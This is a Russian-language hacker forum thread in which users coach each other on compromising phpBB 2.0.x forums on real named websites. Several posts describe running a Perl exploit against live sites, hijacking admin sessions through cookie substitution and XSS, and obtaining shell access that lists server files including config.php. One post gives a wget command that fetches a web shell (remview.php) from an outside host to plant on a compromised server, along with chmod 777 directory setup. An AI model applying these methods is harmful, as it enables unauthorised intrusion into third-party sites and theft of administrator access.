Я бы попробывал бы сплойтом bbsh.exe , потом для версии 2,0,6 (см.видео) потом для 2,0,13 с подменой куков .
Чет не выходит пишет: _ nom du cookie recuperer : phpbb2mysql _ SESSION ID recuperщ ... 70341aa785acbaa75ceda29eac9bddda http://mariel.ru/forum/?sid=70341aa785acbaa75ceda29eac9bddda _ recuperation du nom de la table sql ... can't find Пробовал ломануть через кук (видио Winux'a) внизу сылка на админку есть, а ник админа не уводит Пробовал через XSS, всталяю кук и тож ничего не происходит
T-REXу и др. Что касается сплойта, че-то не выходит... C:\>D:\usr\bin\perl.exe phpbb2.0.15.pl http://www.devichnik.ru/forums/viewtopic.php?t =31616 www.devichnik.ru - 80 - forums/viewtopic.php?t=31616 phpBB2.0.15> ls -la phpBB2.0.15> и дальше тишина...
Что значит не уводит ? Ты в админку входиш там товй ип или прокся српава , а слева выделен админ и его логин .
В видео показано, что когда обновляешь, то заходишь под ником админа. А у меня написано "Вход". Я как-бы вылетаю. А внизу сылка на админку, чтоб в неё войти требуется ввести логин и пароль админа
m0nzt3r Понял, спасибо ! Я думал в сплойте ошибки. No fear Так впереди же привели исходники на перле. Даже два. Установи ActivePerl-5.8.6.811-MSWin32-x86-122208 и пробуй ! Почитай сначала help.
T-REXу А как проверить: пропатчили его или нет ? У меня по форумам опыта мало, но с IPB как не странно все получилось - главное чтоб сплойт работал !!! Попробовал еще штук 5 phpBB 2.0.15 - то же самое (не робит).
VARVAR, ну проверь ещё раз на уязвимость. Админы на месте не сидят. Нихрена не выходит. Сначала я создал каталог (mkdir shellys ), потом я поменял на него права (chmod 777 shellys ), перехожу в shellys с cd и заливаю туда шелл. Нихрена он туды не заливается.
Ты права менял не с nobody? Бывают и такие...)) Ты сначала посмотри свои права то... И че ты шелл заливал? Уж не wgetом ли? Проверь сначала, есть ли он вообще.
Права менял просто chmod'ом. Свои права? Яж создал папку с 777 правами. Как раз wgetom, он есть ибо хелп к нему есть(наверно глупо?). Сказать могу одно, у меня точно такой же геморой, как и у чувака из видео (он там ещё по ICQ базарил ).
У меня вопррос все сработало , выдало следущее drwxr-xr-x 10 test wwwusers 1024 May 18 15:10 . drwxr-x--- 11 test wwwusers 512 Jun 17 12:02 .. drwxr-xr-x 2 test wwwusers 1024 May 14 01:04 admin drwxr-xr-x 2 test wwwusers 512 Mar 11 17:34 cache -rw-r--r-- 1 test wwwusers 6726 Feb 27 20:30 common.php -rw-r--r-- 1 test wwwusers 249 Mar 18 18:39 config.php drwxr-xr-x 2 test wwwusers 512 May 14 01:04 db drwxr-xr-x 2 test wwwusers 512 Mar 11 17:34 docs -rw-r--r-- 1 test wwwusers 810 Feb 27 20:30 extension.inc -rw-r--r-- 1 test wwwusers 3643 Feb 27 20:30 faq.php -rw-r--r-- 1 test wwwusers 45673 May 14 01:04 groupcp.php drwxr-xr-x 4 test wwwusers 1024 Feb 27 22:30 images drwxr-xr-x 2 test wwwusers 1024 May 14 01:04 includes -rw-r--r-- 1 test wwwusers 14515 Feb 27 20:30 index.php drwxr-xr-x 4 test wwwusers 512 May 14 01:04 language -rw-r--r-- 1 test wwwusers 7748 May 14 01:04 login.php -rw-r--r-- 1 test wwwusers 12150 Feb 27 20:30 memberlist.php -rw-r--r-- 1 test wwwusers 37796 May 14 01:04 modcp.php -rw-r--r-- 1 test wwwusers 34445 May 14 01:04 posting.php -rw-r--r-- 1 test wwwusers 72541 May 14 01:04 privmsg.php -rw-r--r-- 1 test wwwusers 3947 Feb 27 20:30 profile.php -rw-r--r-- 1 test wwwusers 43265 May 14 01:04 search.php drwxr-xr-x 4 test wwwusers 512 May 18 11:37 templates -rw-r--r-- 1 test wwwusers 23154 Feb 27 20:30 viewforum.php -rw-r--r-- 1 test wwwusers 7233 May 14 01:04 viewonline.php -rw-r--r-- 1 test wwwusers 45228 May 14 01:04 viewtopic.php пытался залить в templates wget http://sanyax.narod.ru/remview.php -o /temlates и ничего не закачивается и просто wget http://sanyax.narod.ru/remview.php и curl и lynx , подскажите что не так , я плохо разбираюсь в правах на папки может туда запрещено ?
